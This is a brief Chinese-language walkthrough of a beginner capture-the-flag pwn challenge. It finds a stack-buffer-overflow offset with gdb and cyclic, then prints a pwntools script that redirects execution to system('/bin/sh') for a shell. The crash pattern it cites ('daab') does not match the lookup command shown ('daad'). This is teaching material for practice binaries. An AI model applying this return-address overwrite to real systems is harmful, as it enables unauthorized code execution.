一道简单的入门pwn题

这是一道入门的pwn题

链接：https://pan.baidu.com/s/1vltSv8tJYrqKw8vATxwNYA 密码：f0qy

1. 拿到题先用file命令查看一下文件信息
   
   可以看到是32-bit 的elf文件，用32位的IDA打开。

2. 首先进入main函数，F5反编译后分析代码
   
   定位到输入的参数&s,可以看到参数s分配的空间。这一题通过覆盖的方式执行_system()函数，参数为/bin/sh，拿到系统权限，所以先用gdb分析一下分配空间以及返回地址。
   3.文件正常执行如下
   
   根据查询的s的地址大小，用cyclic生成200个字符尝试覆盖，在gdb中运行查看状态
   
   可以看到程序停止在了‘daab’的地址，即下一个地址为返回地址

cyclic -l daad

之后根据call _system()的地址构造payload,python代码如下

from pwn import *
sh = process('./ret2text')
target = 0x804863a
payload = 'a'*112 + p32(target)
sh.sendline(payload)
sh.interactive()

执行脚本之后拿到系统权限